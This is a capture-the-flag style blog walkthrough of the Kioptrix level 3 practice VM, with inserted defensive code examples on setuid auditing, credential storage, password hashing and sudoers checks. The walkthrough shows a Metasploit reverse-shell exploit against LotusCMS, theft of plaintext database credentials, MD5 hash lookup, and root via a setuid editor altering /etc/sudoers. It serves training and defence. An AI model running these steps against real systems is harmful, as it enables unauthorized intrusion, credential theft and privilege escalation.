[Hacking series] – Kioptrix level 3

Written by  on June 8, 2015 

Code name: Kioptrix3

Webpage: http://kioptrix.com/

VM Download: www.kioptrix.com/dlvm/KVM3.rar

Challenge: Get root on the system

First of all, let's see which ports are open.

# nmap -p- -Pn -A 192.168.11.11

Port 80 is open, as usual; let's browse it.

Ligoat? Hmm, we can dig a little deeper.

Jackpot! So, LotusCMS, huh...

We can search for it in exploit databases such as Metasploit or Exploit-DB to see if there is something useful.

# msfconsole

msf > search lotus

Exploit found? Let's try this one.

msf > set RHOST 192.168.11.11

msf > set URI /

We can also set the payload and edit its options.

msf > set LHOST 192.168.11.7

msf > set LPORT 8723

And then just run the exploit

msf > exploit

Now we are in, but our shell is not privileged, so we must find a way to escalate our privileges on the system. One way to do that is to look for special files that are always run as their owner: the user owner (setuid), the group owner (setgid) or the directory owner. We can search for files that always execute as their user owner with:

$ find / -perm -u=s -type f 2>/dev/null

And we found an interesting one: /usr/local/bin/ht
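The same enumeration, turned into a scheduled check: the script below (an added example, not from the original post) walks the filesystem for setuid/setgid regular files and diffs them against an approved baseline, so a stray setuid binary such as /usr/local/bin/ht shows up as an alert instead of waiting for someone to run find. The baseline paths in it are constructed placeholders, and unreadable directories are skipped just as 2>/dev/null hides them above.

```python
"""Audit setuid/setgid files against a known-good baseline.

Added example (not from the original post). Mirrors
`find / -perm -u=s -type f 2>/dev/null`, but also catches setgid files and
reports anything not in an approved list so it can run from cron or an
agent and raise an alert.
"""
import os
import stat
from typing import Dict, Iterable, Set


def find_setid_files(root: str) -> Dict[str, str]:
    """Walk `root` and return {path: "suid" | "sgid" | "suid+sgid"} for every
    regular file carrying either bit. Symlinks are not followed, and
    directories we cannot read are skipped (the `2>/dev/null` equivalent)."""
    found: Dict[str, str] = {}
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _err: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            bits = []
            if st.st_mode & stat.S_ISUID:
                bits.append("suid")
            if st.st_mode & stat.S_ISGID:
                bits.append("sgid")
            if bits:
                found[path] = "+".join(bits)
    return found


def unexpected_setid(current: Dict[str, str], baseline: Iterable[str]) -> Set[str]:
    """Paths that carry setuid/setgid now but are not in the approved baseline."""
    return set(current) - set(baseline)


if __name__ == "__main__":
    # Constructed baseline: the set-id binaries a stock install is expected to
    # have. In practice this list is generated once from a clean image.
    APPROVED = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su"}
    current = find_setid_files("/")
    for path in sorted(unexpected_setid(current, APPROVED)):
        print(f"ALERT: unexpected {current[path]} file: {path}")
```

Run it as root from cron and forward the ALERT lines to your log pipeline; a new entry such as /usr/local/bin/ht is then a detection event, and the fix on the host is simply to drop the bit (chmod u-s) unless there is a documented reason for it.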

But if we try to open it from our shell...

Damn, we will need a full interactive shell for that. ssh will do the job, but we need to find a valid user and its password... we need to dig deeper into the system.

After a quick look around, we found it in the web server's public directory. As the webapp runs on PHP and MySQL, we can find the MySQL admin password stored in plain text inside the webapp's configuration file!
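The defensive counterpart to this finding, as an added example that is not part of the original post: a credential loader that refuses to use a secrets file kept under the web root or readable by other local users, which is exactly the combination that exposed the MySQL password here. The KEY=VALUE file format, the file paths and the web root location are assumptions for the demo.

```python
"""Load database credentials only from a safely placed, owner-only file.

Added example, not from the original post. Two checks: the file must not live
under the web root (where a misconfiguration or a file-read bug serves it),
and it must not be readable by group or others (where any local shell, such as
the one obtained through the CMS exploit, can simply cat it).
"""
import os
import stat
from typing import Dict


def load_db_credentials(path: str, webroot: str) -> Dict[str, str]:
    """Parse KEY=VALUE lines from `path`, raising PermissionError if the file
    is under `webroot` or has any group/other permission bits set."""
    real = os.path.realpath(path)
    root = os.path.realpath(webroot)
    if real == root or real.startswith(root + os.sep):
        raise PermissionError(f"{path} is inside the web root {webroot}")

    st = os.stat(real)
    if st.st_mode & (stat.S_IRWXG | stat.S_IRWXO):
        raise PermissionError(
            f"{path} is accessible to group/others (mode {stat.S_IMODE(st.st_mode):04o}); "
            "expected 0600 owned by the application user"
        )

    creds: Dict[str, str] = {}
    with open(real, encoding="utf-8") as fh:
        for line in fh:
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue  # comments, blanks and malformed lines are ignored
            key, value = line.split("=", 1)
            creds[key.strip()] = value.strip()
    return creds


if __name__ == "__main__":
    # Assumed layout: secrets in /etc/myapp/db.env (0600), web root /var/www/html.
    print(load_db_credentials("/etc/myapp/db.env", "/var/www/html"))
```

Failing closed at startup turns a silent exposure into a deployment error that shows up in the application log; the same stat check can be wired into a configuration-management audit so the permissions cannot drift back.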

Nice! Now we can try to log in with these credentials. We can log into phpMyAdmin, which we found earlier using nikto.

After looking inside the database's tables, we found two interesting entries.

Looks like passwords are stored as unsalted MD5 hashes; we can look them up in a public MD5 hash database.
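Why the lookup worked, and what fixes it: an added example (not the post's code, and not how LotusCMS actually stores passwords) contrasting unsalted MD5, where every user with the same password gets the same digest and a precomputed table answers instantly, with a salted, iterated PBKDF2-SHA256 record built from Python's standard library, plus the check an application uses to rehash legacy records on the next successful login. The iteration count is an assumption following current OWASP guidance.

```python
"""Unsalted MD5 versus salted, iterated PBKDF2-SHA256 for stored passwords.

Added example, not from the original post. Standard library only.
"""
import hashlib
import hmac
import os
from typing import Optional

# Assumption: PBKDF2-SHA256 iteration count per current OWASP guidance.
ITERATIONS = 600_000


def md5_unsalted(password: str) -> str:
    """How the CMS in the walkthrough stored passwords: one deterministic digest
    per password, so a precomputed table reverses any common one."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Salted, iterated hash. A fresh 16-byte random salt per user means two
    users with the same password get different records (no shared lookup
    table), and the iteration count makes every guess expensive."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
        iterations = int(iters)
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(dk_hex)
    except ValueError:
        return False  # malformed record
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(candidate, expected)


def needs_rehash(stored: str) -> bool:
    """True for legacy records (a bare 32-hex MD5 digest) or PBKDF2 records
    below the current cost, so they can be upgraded after a successful login."""
    if len(stored) == 32 and all(c in "0123456789abcdef" for c in stored.lower()):
        return True
    parts = stored.split("$")
    return len(parts) != 4 or parts[0] != "pbkdf2_sha256" or int(parts[1]) < ITERATIONS


if __name__ == "__main__":
    # Two users choosing the same weak password: identical MD5, distinct PBKDF2.
    print("md5   :", md5_unsalted("password"), md5_unsalted("password"))
    print("pbkdf2:", hash_password("password"))
    print("pbkdf2:", hash_password("password"))
```

Migration is incremental: keep the old MD5 column, and when a user logs in and needs_rehash() is true, verify against MD5 one last time, store hash_password() instead, and delete the old digest.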

Password found; now we can log in via ssh.

We are in. Now that we have a full interactive shell, we can go back and execute ht.

Let’s see

It looks like a text editor. As we are running it with root privileges, we can try to open or edit some interesting file; two candidates are /etc/sudoers and /etc/shadow.

After opening the file, we can edit it.

I've edited /etc/sudoers and granted all privileges to the user loneferret. Now we can just run

# sudo su

And get root
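An added example (not from the original post) of the check a defender would run to catch exactly this change: a small parser for /etc/sudoers user specifications that flags accounts granted ALL, or any NOPASSWD entry, beyond an approved set. The sample sudoers text is constructed, with a loneferret line matching the edit above; the parser handles plain user specs and deliberately skips Defaults, alias definitions and include directives.

```python
"""Flag risky /etc/sudoers user specifications.

Added example, not from the original post. Parses lines of the form
    user  host=(runas) [TAG:] command, command...
and reports users who may run ALL or who have NOPASSWD entries.
"""
import re
from typing import Dict, List, Sequence

USER_SPEC = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias", "@include")

# Constructed sample, not the VM's real file. The loneferret line is the kind
# of grant the walkthrough adds with the setuid editor.
SAMPLE_SUDOERS = """\
# constructed /etc/sudoers
Defaults        env_reset
root            ALL=(ALL) ALL
%admin          ALL=(ALL) ALL
loneferret      ALL=(ALL) NOPASSWD: ALL
www-data        ALL=(root) NOPASSWD: /usr/sbin/service apache2 restart
"""


def parse_sudoers(text: str) -> List[Dict[str, object]]:
    """Return one dict per user specification; comments, Defaults, aliases and
    include directives are ignored (this is an audit helper, not a full grammar)."""
    entries: List[Dict[str, object]] = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # also drops legacy '#include' lines
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        nopasswd = False
        commands: List[str] = []
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            # Peel leading tags such as NOPASSWD: or SETENV: off the command.
            while ":" in cmd and cmd.split(":", 1)[0].isupper():
                tag, cmd = cmd.split(":", 1)
                cmd = cmd.strip()
                if tag == "NOPASSWD":
                    nopasswd = True
            commands.append(cmd)
        entries.append({
            "user": m.group("user"),
            "host": m.group("host"),
            "runas": m.group("runas") or "root",  # sudoers default target user
            "commands": commands,
            "nopasswd": nopasswd,
        })
    return entries


def audit_sudoers(text: str, approved: Sequence[str] = ("root", "%admin", "%sudo")) -> List[str]:
    """Findings for users outside `approved` who may run ALL, and for any NOPASSWD grant."""
    findings: List[str] = []
    for e in parse_sudoers(text):
        user, cmds = str(e["user"]), list(e["commands"])  # type: ignore[arg-type]
        if "ALL" in cmds and user not in approved:
            findings.append(f"{user} may run ALL commands as {e['runas']} on {e['host']}")
        if e["nopasswd"]:
            findings.append(f"{user} has NOPASSWD for: {', '.join(cmds)}")
    return findings


if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS):
        print("FINDING:", finding)
```

Pair the audit with file-integrity monitoring on /etc/sudoers and the sudoers.d directory: the edit in this walkthrough bypasses visudo entirely, so a change in the file's hash with no matching change ticket is the signal, and the audit tells you what the change granted.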

Game over kioptrix3 P-)

Category : hacking series
